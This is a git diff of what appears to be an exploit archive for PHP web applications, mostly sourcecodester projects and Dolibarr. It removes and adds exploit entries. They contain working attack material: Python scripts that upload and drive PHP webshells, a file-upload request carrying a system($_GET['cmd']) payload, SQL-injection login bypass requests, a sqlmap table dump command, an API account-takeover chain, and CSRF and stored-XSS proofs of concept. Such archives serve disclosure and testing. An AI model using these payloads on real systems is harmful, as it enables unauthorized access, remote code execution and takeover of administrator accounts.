a/exploits/php/webapps/50248.txt b/exploits/php/webapps/50248.txt deleted file mode 100644 index da2841c70..000000000 --- a/exploits/php/webapps/50248.txt +++ /dev/null @@ -1,192 +0,0 @@ -# Exploit Title: Dolibarr ERP/CRM 14.0.1 - Privilege Escalation -# Date: April 8, 2021 -# Exploit Author: Vishwaraj101 -# Vendor Homepage: https://www.dolibarr.org/ -# Affected Version: <= 14.0.1 -# Patch: https://github.com/Dolibarr/dolibarr/commit/489cff46a37b04784d8e884af7fc2ad623bee17d - -*Summary:* -Using the below chain of issues attacker can compromise any dolibarr -user account including the admin. - -*Poc:* - - 1. Visit https://example.com/api/index.php/login?login=demo&password=demo - try to login with a test user with 0 permissons or less permissions. - 2. We will receive an api token in return. - 3. Next we need to fetch the user id of the user whose account we want - to own. - - - -*First we need to fetch the user id of the admin user using the below api.* - -*Request1:* - -GET /api/index.php/users/login/admin HTTP/1.1Host: -preview2.dolibarr.ohttps://preview2.dolibarr.org/api/index.php/users/login/adminrg -User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 -(KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 -root@tqn9xk6rn6fq8x9ijbmpouosrjxan3srh.burpcollaborator.netAccept: -application/json -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflateDOLAPIKEY: test1337Connection: close - -*This will return the user details using the username. Now update the -victim user account via below api (include the json body received from the -previous request1 and replace the email id from below json to the attacker -controlled email)* - - -*Request2:*PUT /api/index.php/users/*12* HTTP/1.1 - -Host: preview2.dolibarr.orgUser-Agent: Mozilla/5.0 (Windows NT 6.1; -WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 -Safari/537.36 root@67bmexn44jw3paqv0o3257558wen5mwal.burpcollaborator.netAccept: -application/jsonAccept-Language: en-US,en;q=0.5Accept-Encoding: gzip, -deflateDOLAPIKEY: test1337Origin: -https://preview2.dolibarr.orgConnection: closeReferer: -http://5z5l6wf3wio2h9iusnv1x6x40v6mxkw8l.burpcollaborator.net/refContent-Length: -3221 -{ - "id": "12", - "statut": "1", - "employee": "1", - "civility_code": null, - "gender": "woman", - "birth": 495583200, - "email": "*attacker@example.com *", - "personal_email": "", - "socialnetworks": { - "facebook": "", - "skype": "", - "twitter": "", - "linkedin": "", - "instagram": "", - "snapchat": "", - "googleplus": "", - "youtube": "", - "whatsapp": "", - "tumblr": "", - "vero": "", - "viadeo": "", - "slack": "", - "xing": "", - "meetup": "", - "pinterest": "", - "flickr": "", - "500px": "", - "giphy": "", - "gifycat": "", - "dailymotion": "", - "vimeo": "", - "periscope": "", - "twitch": "", - "discord": "", - "wikipedia": "", - "reddit": "", - "quora": "", - "tripadvisor": "", - "mastodon": "", - "diaspora": "", - "viber": "" - }, - "job": "Admin Technical", - "signature": "", - "address": "", - "zip": "", - "town": "", - "state_id": null, - "state_code": null, - "state": null, - "office_phone": "", - "office_fax": "", - "user_mobile": "", - "personal_mobile": "", - "admin": "1", - "login": "admin", - "entity": "0", - "datec": 1507187386, - "datem": 1617819214, - "socid": null, - "contact_id": null, - "fk_member": null, - "fk_user": "11", - "fk_user_expense_validator": null, - "fk_user_holiday_validator": null, - "clicktodial_url": null, - "clicktodial_login": null, - "clicktodial_poste": null, - "datelastlogin": 1617816891, - "datepreviouslogin": 1617815935, - "datestartvalidity": "", - "dateendvalidity": "", - "photo": "com.jpg", - "lang": "fr_FR", - "rights": { - "user": { - "user": {}, - "self": {} - } - }, - "conf": {}, - "users": [], - "parentof": null, - "accountancy_code": "", - "weeklyhours": "39.00000000", - "color": "", - "dateemployment": "", - "dateemploymentend": "", - "default_c_exp_tax_cat": null, - "default_range": null, - "fk_warehouse": null, - "import_key": null, - "array_options": [], - "array_languages": null, - "linkedObjectsIds": null, - "canvas": null, - "fk_project": null, - "contact": null, - "thirdparty": null, - "user": null, - "origin": null, - "origin_id": null, - "ref": "12", - "ref_ext": null, - "status": null, - "country": null, - "country_id": null, - "country_code": "", - "region_id": null, - "barcode_type": null, - "barcode_type_code": null, - "barcode_type_label": null, - "barcode_type_coder": null, - "mode_reglement_id": null, - "cond_reglement_id": null, - "demand_reason_id": null, - "transport_mode_id": null, - "cond_reglement": null, - "modelpdf": null, - "last_main_doc": null, - "fk_bank": null, - "fk_account": null, - "note_public": "", - "note_private": "", - "note": "", - "name": null, - "lastname": "Adminson", - "firstname": "Alice", - "civility_id": null, - "date_creation": null, - "date_validation": null, - "date_modification": null, - "specimen": 0, - "alreadypaid": null, - "liste_limit": 0 -} - -This will reset the admin email account to the attacker controlled -email account, now using the password reset feature attacker will -reset the admin account password and will gain access to the admin -account. \ No newline at end of file diff --git a/exploits/php/webapps/50264.py b/exploits/php/webapps/50264.py deleted file mode 100755 index 73553d1da..000000000 --- a/exploits/php/webapps/50264.py +++ /dev/null @@ -1,78 +0,0 @@ -# Exploit Title: Patient Appointment Scheduler System 1.0 - Unauthenticated File Upload & Remote Code Execution (RCE) -# Date: 03/09/2021 -# Exploit Author: a-rey -# Vendor Homepage: https://www.sourcecodester.com/php/14928/patient-appointment-scheduler-system-using-php-free-source-code.html -# Software Link: https://www.sourcecodester.com/download-code?nid=14928 -# Version: v1.0 -# Tested on: Ubuntu 20.04.3 LTS (Focal Fossa) with XAMPP 8.0.10-0 -# Exploit Write-Up: https://github.com/a-rey/exploits/blob/main/writeups/Patient_Appointment_Scheduler_System/v1.0/writeup.md - -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- - -import os -import time -import logging -import requests -import argparse - -BANNER = """ -╔═════════════════════════════════════════════════════════════════════════════════════════════════╗ -║ Patient Appointment Scheduler System v1.0 - Unauthenticated File Upload & Remote Code Execution ║ -╚═════════════════════════════════════════════════════════════════════════════════════════════════╝ - by: \033[0m\033[1;31m █████╗ ██████╗ ███████╗██╗ ██╗\033[0m - \033[0m\033[1;32m██╔══██╗ ██╔══██╗██╔════╝██║ ██║\033[0m - \033[0m\033[1;33m███████║ ███ ██████╔╝█████╗ ██╗ ██═╝\033[0m - \033[0m\033[1;34m██╔══██║ ██╔══██╗██╔══╝ ██╔╝ \033[0m - \033[0m\033[1;35m██║ ██║ ██║ ██║███████╗ ██║ \033[0m - \033[0m\033[1;36m╚═╝ ╚═╝ ╚═╝ ╚═╝╚══════╝ ╚═╝ \033[0m -""" - - -def exploit(url:str, file:str, delay:int) -> None: - if not os.path.exists(file): - logging.error(f'webshell payload "{file}"" does not exist?') - return - logging.info(f'uploading webshell payload "{os.path.basename(file)}" to {url}/uploads ...') - uploadTime = int(time.time()) - r = requests.post(url + '/classes/SystemSettings.php', - files={'img' : (os.path.basename(file), open(file, 'rb'))}, # NOTE: can also use 'cover' field, but this is more inconspicuous - params={'f' : 'update_settings'}, - verify=False - ) - if not r.ok: - logging.error('HTTP upload request failed') - return - logging.info(f'finding new payload file name on target (+/- {delay} seconds) ...') - for i in range(uploadTime - delay, uploadTime + delay + 1): - r = requests.get(url + f'/uploads/{str(i)}_{os.path.basename(file)}', allow_redirects=False) - logging.debug(f'trying {url}/uploads/{str(i)}_{os.path.basename(file)} ...') - # NOTE: website will send redirects for all files that do not exist - if r.status_code != 302: - logging.success(f'webshell payload found on target at {url}/uploads/{str(i)}_{os.path.basename(file)}') - return - logging.error('failed to find payload on target') - logging.warning('maybe need a larger delay or uploads directory is not writable?') - return - - -if __name__ == '__main__': - # parse arguments - parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter, usage=BANNER) - parser.add_argument('-u', '--url', help='website URL', type=str, required=True) - parser.add_argument('-p', '--payload', help='PHP webshell file to upload', type=str, required=True) - parser.add_argument('-d', '--delay', help='delay (seconds) for file timestamp in payload name on target', type=int, required=False, default=60) - parser.add_argument('--debug', help='enable debugging output', action='store_true', default=False) - args = parser.parse_args() - # define logger - logging.basicConfig(format='[%(asctime)s][%(levelname)s] %(message)s', datefmt='%d %b %Y %H:%M:%S', level='INFO' if not args.debug else 'DEBUG') - logging.SUCCESS = logging.CRITICAL + 1 - logging.addLevelName(logging.SUCCESS, '\033[0m\033[1;32mGOOD\033[0m') - logging.addLevelName(logging.ERROR, '\033[0m\033[1;31mFAIL\033[0m') - logging.addLevelName(logging.WARNING, '\033[0m\033[1;33mWARN\033[0m') - logging.addLevelName(logging.INFO, '\033[0m\033[1;36mINFO\033[0m') - logging.success = lambda msg, *args: logging.getLogger(__name__)._log(logging.SUCCESS, msg, args) - # print banner - print(BANNER) - # run exploit - exploit(args.url, args.payload, args.delay) \ No newline at end of file diff --git a/exploits/php/webapps/50308.txt b/exploits/php/webapps/50308.txt deleted file mode 100644 index 7b235bf01..000000000 --- a/exploits/php/webapps/50308.txt +++ /dev/null @@ -1,129 +0,0 @@ -# Exploit Title: Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated) -# Exploit Author: Abdullah Khawaja (hax.3xploit) -# Date: 2021-09-21 -# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html -# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/expense_budget.zip -# Version: 2.0 -# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4 -# Description: Budget and Expense Tracker System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters. - - - -# RCE via executing exploit: - # Step 1: run the exploit in python with this command: python3 BMAETS_v1.0.py - # Step 2: Input the URL of the vulnerable application: Example: http://localhost/expense_budget/ - - -import requests, sys, urllib, re -import datetime -from colorama import Fore, Back, Style - -requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) - - - - - -header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL - -print(Style.BRIGHT+" Budget and Expense Tracker System 1.0") -print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL) -print(header) - -print(r""" - ______ _______ ________ - ___ //_/__ /_______ ___ _______ ______(_)_____ _ - __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ - _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / - /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ - /___/ - abdullahkhawaja.com - """) - - - -GREEN = '\033[32m' # Green Text -RED = '\033[31m' # Red Text -RESET = '\033[m' # reset to the defaults - -proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'} - - -#Create a new session -s = requests.Session() - - -#Set Cookie -cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'} - -LINK=input("Enter URL of The Vulnarable Application : ") - - -def webshell(LINK, session): - try: - WEB_SHELL = LINK+'/uploads/'+filename - getdir = {'cmd': 'echo %CD%'} - r2 = session.get(WEB_SHELL, params=getdir, verify=False, proxies=proxies) - status = r2.status_code - if status != 200: - print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL) - r2.raise_for_status() - print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.') - cwd = re.findall('[CDEF].*', r2.text) - cwd = cwd[0]+"> " - term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET - while True: - thought = input(term) - command = {'cmd': thought} - r2 = requests.get(WEB_SHELL, params=command, verify=False) - status = r2.status_code - if status != 200: - r2.raise_for_status() - response2 = r2.text - print(response2) - except: - print("\r\nExiting.") - sys.exit(-1) - - -#Creating a PHP Web Shell - -phpshell = { - 'img': - ( - 'shell.php', - '', - 'application/octet-stream', - {'Content-Disposition': 'form-data'} - ) - } - -# Defining value for form data -data = {'name':'Budget and Expense Tracker System - PHP', 'short_name':'B&E Tracker'} - - -def id_generator(): - x = datetime.datetime.now() - date_string = x.strftime("%y-%m-%d %H:%M") - date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M") - timestamp = datetime.datetime.timestamp(date) - file = int(timestamp) - final_name = str(file)+'_shell.php' - return final_name - -filename = id_generator() -#Uploading Reverse Shell -print("[*]Uploading PHP Shell For RCE...") -upload = s.post(LINK+'classes/SystemSettings.php?f=update_settings', cookies=cookies, files=phpshell, data=data, proxies=proxies) - -shell_upload = True if("1" in upload.text) else False -u=shell_upload -if u: - print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET) -else: - print(RED+"[-]Failed To Upload The PHP Shell!", RESET) - - - -#Executing The Webshell -webshell(LINK, s) \ No newline at end of file diff --git a/exploits/php/webapps/50326.txt b/exploits/php/webapps/50326.txt deleted file mode 100644 index bfb9ee9a3..000000000 --- a/exploits/php/webapps/50326.txt +++ /dev/null @@ -1,52 +0,0 @@ -# Exploit Title: Budget and Expense Tracker System 1.0 - Arbitrary File Upload -# Exploit Author: ()t/\/\1 -# Date: 23/09/2021 -# Vendor Homepage: https://www.sourcecodester.com/php/14893/budget-and-expense-tracker-system-php-free-source-code.html -# Tested on: Linux -# Version: 2.0 - -# Exploit Description: -The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands. - - -# PoC request - -POST /expense_budget/classes/Users.php?f=save HTTP/1.1 -Host: localhost -User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 -Accept: */* -Accept-Language: en-US,en;q=0.5 -Accept-Encoding: gzip, deflate -Referer: http://localhost/expense_budget/admin/?page=user -X-Requested-With: XMLHttpRequest -Content-Type: multipart/form-data; boundary=---------------------------1399170066243244238234165712 -Content-Length: 824 -Connection: close -Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c - ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="id" - -1 ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="firstname" - -A ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="lastname" - -a ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="username" - -admin ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="password" - - ------------------------------1399170066243244238234165712 -Content-Disposition: form-data; name="img"; filename="na3na3.php" -Content-Type: image/jpeg - -";system($_GET['cmd']); ?> ------------------------------1399170066243244238234165712-- \ No newline at end of file diff --git a/exploits/php/webapps/50403.txt b/exploits/php/webapps/50403.txt new file mode 100644 index 000000000..e25e807d8 --- /dev/null +++ b/exploits/php/webapps/50403.txt @@ -0,0 +1,35 @@ +# Exploit Title: Simple Payroll System 1.0 - SQLi Authentication Bypass +# Date: 2021-10-09 +# Exploit Author: Yash Mahajan +# Vendor Homepage: https://www.sourcecodester.com/php/14974/simple-payroll-system-dynamic-tax-bracket-php-using-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple_payroll_0.zip +# Version: 1.0 +# Tested on: Windows 10 +# Description: Simple Payroll System v1.0 Login page can be bypassed with a SQLi into the username parameter. + +Steps To Reproduce: + +1 - Navigate to http://localhost/simple_payroll/admin/login.php +2 - Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field. +3 - Click on "Login" button and you are logged in as administrator. + +Proof Of Concept: + +POST /simple_payroll/Actions.php?a=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 37 +Origin: http://localhost +Connection: close +Referer: http://localhost/simple_payroll/admin/login.php +Cookie: PHPSESSID=ijad04l4pfb2oec6u2vmi4ll9p +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +username='+or+1%3D1--+&password=admin \ No newline at end of file diff --git a/exploits/php/webapps/50404.txt b/exploits/php/webapps/50404.txt new file mode 100644 index 000000000..d201b6f0d --- /dev/null +++ b/exploits/php/webapps/50404.txt @@ -0,0 +1,46 @@ +# Title: Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated) +# Exploit Author: Yash Mahajan +# Date: 2021-10-09 +# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html +# Version: 1 +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip +# Tested On: Windows 10, XAMPP +# Vulnerable Parameters: "id" , "username" + +Steps to Reproduce: + +A) SQL Injection (Authentication Bypass) + +1) Navigate to http://localhost/employment_application/admin/login.php +2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field. +3) Click on "Login" button and you are logged in as administrator. + +Request: +======== + +POST /employment_application/Actions.php?a=login HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 38 +Origin: http://localhost +Connection: close +Referer: http://localhost/employment_application/admin/login.php +Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +username='+or+1%3D1--+-&password=admin + +-------------------------------------------------------------------------------- + +B) + +1) Vulnerable Parameter: "id" +2) Sqlmap Command to get retrieve tables from the database +3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1" --level=3 --risk=2 --banner --dbms=sqlite --tables \ No newline at end of file diff --git a/exploits/php/webapps/50409.html b/exploits/php/webapps/50409.html new file mode 100644 index 000000000..9e005d66f --- /dev/null +++ b/exploits/php/webapps/50409.html @@ -0,0 +1,33 @@ +# Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF) +# Date: 10/11/2021 +# Exploit Author: Murat DEMIRCI (@butterflyhunt3r) +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html +# Version: 1 +# Tested on: Windows 10 + +Detail: +The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request. + +CSRF PoC: + +-------------------------------------------------------------------------------------- + + + + + +
+ + + + + +
+ + + + +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/php/webapps/50410.txt b/exploits/php/webapps/50410.txt new file mode 100644 index 000000000..61adcb92d --- /dev/null +++ b/exploits/php/webapps/50410.txt @@ -0,0 +1,87 @@ +# Exploit Title: Online Learning System 2.0 - 'Multiple' SQLi Authentication Bypass +# Date: 11.10.2021 +# Exploit Author: Oguzhan Kara +# Vendor Homepage: https://www.sourcecodester.com/php/14929/online-learning-system-v2-using-php-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14929&title=Online+Learning+System+V2+using+PHP+Free+Source+Code +# Version: 2.0 +# Tested on: Kali Linux, Windows 10 - XAMPP +# Online Learning System v2.0 Login pages can be bypassed with a simple SQLi to the username/facultyID/studentID parameters. + +Steps To Reproduce: +1 - Go to one of the login portals +2 - Enter the payload to username field as "bypass' or 1=1-- -" without double-quotes ("bypass" is can be anything in this scenario) and type anything you want to the password field. +3 - Click on "Login" button and you are logged in as first user in database, which is admin user for admin portal. + +PoC + +---Admin Portal--- + +POST /elearning/classes/Login.php?f=login HTTP/1.1 +Host: localhost +Content-Length: 45 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/elearning/admin/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 +Connection: close + +username=bypass'+or+1%3D1--+-&password=bypass + +---Faculty Portal--- + +POST /elearning/classes/Login.php?f=flogin HTTP/1.1 +Host: localhost +Content-Length: 47 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/elearning/faculty/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 +Connection: close + +faculty_id=bypass'+or+1%3D1--+-&password=bypass + +---Student Portal--- + +POST /elearning/classes/Login.php?f=slogin HTTP/1.1 +Host: localhost +Content-Length: 45 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" +Accept: */* +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/elearning/student/login.php +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 +Connection: close + +student_id=bypass'+or+1%3D1--+-&password=test \ No newline at end of file diff --git a/exploits/php/webapps/50411.txt b/exploits/php/webapps/50411.txt new file mode 100644 index 000000000..749a82569 --- /dev/null +++ b/exploits/php/webapps/50411.txt @@ -0,0 +1,34 @@ +# Exploit Title: Simple Issue Tracker System 1.0 - SQLi Authentication Bypass +# Date: 11.10.2021 +# Exploit Author: Bekir Bugra TURKOGLU +# Vendor Homepage: https://www.sourcecodester.com/php/14938/simple-issue-tracker-system-project-using-php-and-sqlite-free-download.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14938&title=Simple+Issue+Tracker+System+Project+using+PHP+and+SQLite+Source+Code+Free+Download +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. + + +Steps To Reproduce: + +1 - Go to the login page http://localhost/issue_tracker/login.php +2 - Enter the payload to username field as "admin" or " ' OR 1 -- - " and enter any character in the password field. +3 - Click on "Login" button and successful login. + +PoC + +POST /issue_tracker/Actions.php?a=login HTTP/1.1 +Host: 192.168.0.111 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 31 +Origin: http://localhost +Connection: close +Referer: http://localhost/issue_tracker/login.php +Cookie: PHPSESSID=71bod5tipklk329lpsoqkvfcb9 + + +username='+OR+1+--+-&password=1 \ No newline at end of file diff --git a/exploits/php/webapps/50412.txt b/exploits/php/webapps/50412.txt new file mode 100644 index 000000000..5fccf54f5 --- /dev/null +++ b/exploits/php/webapps/50412.txt @@ -0,0 +1,53 @@ +# Exploit Title: Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS) +# Date: 11.10.2021 +# Exploit Author: Hüseyin Serkan Balkanli +# Vendor Homepage: https://www.sourcecodester.com/php/14953/student-quarterly-grading-system-using-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14953&title=Student+Quarterly+Grading+System+using+PHP+and+SQLite+Database+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Student Quarterly Grading System v1.0 has Stored XSS at "Add New Class" Function. + +Steps To Reproduce: +1 - Click to Class from Menu and click "Add New". +2 - Enter the payload to "grade" field as "" without double-quotes and choose one of the Subject from list. (It can be anything, doesn't matter.) +3 - Click on Save and you are done. It's gonna be triggered when anyone visits the application. It's global and can trigger on any page. + +PoC + +POST /grading_system/Actions.php?a=save_class HTTP/1.1 +Host: localhost +Content-Length: 457 +sec-ch-ua: ";Not A Brand";v="99", "Chromium";v="94" +Accept: application/json, text/javascript, */*; q=0.01 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryO6Q8ADzs1UvBltkB +X-Requested-With: XMLHttpRequest +sec-ch-ua-mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +sec-ch-ua-platform: "Windows" +Origin: http://localhost +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: http://localhost/grading_system/?page=class +Accept-Encoding: gzip, deflate +Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 +Cookie: PHPSESSID=arkil63kkqsabj3b8cf3oimm2j; __news247__logged=1; __news247__key=4599c04802b500f180c29bc60bdf1923 +Connection: close + +------WebKitFormBoundaryO6Q8ADzs1UvBltkB +Content-Disposition: form-data; name="id" + + +------WebKitFormBoundaryO6Q8ADzs1UvBltkB +Content-Disposition: form-data; name="subject_id" + +3 +------WebKitFormBoundaryO6Q8ADzs1UvBltkB +Content-Disposition: form-data; name="grade" + + +------WebKitFormBoundaryO6Q8ADzs1UvBltkB +Content-Disposition: form-data; name="section" + + +------WebKitFormBoundaryO6Q8ADzs1UvBltkB-- \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 7e35701c2..325172abd 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18488,6 +18488,8 @@ id,file,description,date,author,type,platform,port 50335,exploits/hardware/remote/50335.py,"Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers",1970-01-01,"Michael Alamoot",remote,hardware, 50347,exploits/linux/remote/50347.py,"Apache James Server 2.3.2 - Remote Command Execution (RCE) (Authenticated) (2)",1970-01-01,shinris3n,remote,linux, 50351,exploits/hardware/remote/50351.txt,"Mitrastar GPT-2541GNAC-N1 - Privilege escalation",1970-01-01,"Leonardo Nicolas Servalli",remote,hardware, +50407,exploits/hardware/remote/50407.py,"Cypress Solutions CTM-200/CTM-ONE - Hard-coded Credentials Remote Root (Telnet/SSH)",1970-01-01,LiquidWorm,remote,hardware, +50408,exploits/hardware/remote/50408.txt,"Cypress Solutions CTM-200 2.7.1 - Root Remote OS Command Injection",1970-01-01,LiquidWorm,remote,hardware, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",1970-01-01,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",1970-01-01,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",1970-01-01,Spoofed,webapps,php, @@ -42669,7 +42671,7 @@ id,file,description,date,author,type,platform,port 47160,exploits/php/webapps/47160.txt,"Ovidentia 8.4.3 - SQL Injection",1970-01-01,UserX,webapps,php,80 47161,exploits/php/webapps/47161.php,"MyBB < 1.8.21 - Remote Code Execution",1970-01-01,"Giovanni Chhatta",webapps,php, 47177,exploits/php/webapps/47177.txt,"Moodle Filepicker 3.5.2 - Server Side Request Forgery",1970-01-01,"Fabian Mosch_ Nick Theisinger",webapps,php,80 -47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution",1970-01-01,"Wietse Boonstra",webapps,jsp, +47179,exploits/jsp/webapps/47179.py,"Ahsay Backup 8.1.1.50 - Insecure File Upload and Code Execution (Authenticated)",1970-01-01,"Wietse Boonstra",webapps,jsp, 47180,exploits/jsp/webapps/47180.rb,"Ahsay Backup 7.x - 8.1.1.50 - Authenticated Arbitrary File Upload / Remote Code Execution (Metasploit)",1970-01-01,"Wietse Boonstra",webapps,jsp,443 47181,exploits/jsp/webapps/47181.txt,"Ahsay Backup 7.x - 8.1.1.50 - XML External Entity Injection",1970-01-01,"Wietse Boonstra",webapps,jsp,80 47182,exploits/php/webapps/47182.html,"WordPress Plugin Simple Membership 3.8.4 - Cross-Site Request Forgery",1970-01-01,rubyman,webapps,php,80 @@ -43785,6 +43787,7 @@ id,file,description,date,author,type,platform,port 49432,exploits/multiple/webapps/49432.sh,"EyesOfNetwork 5.3 - File 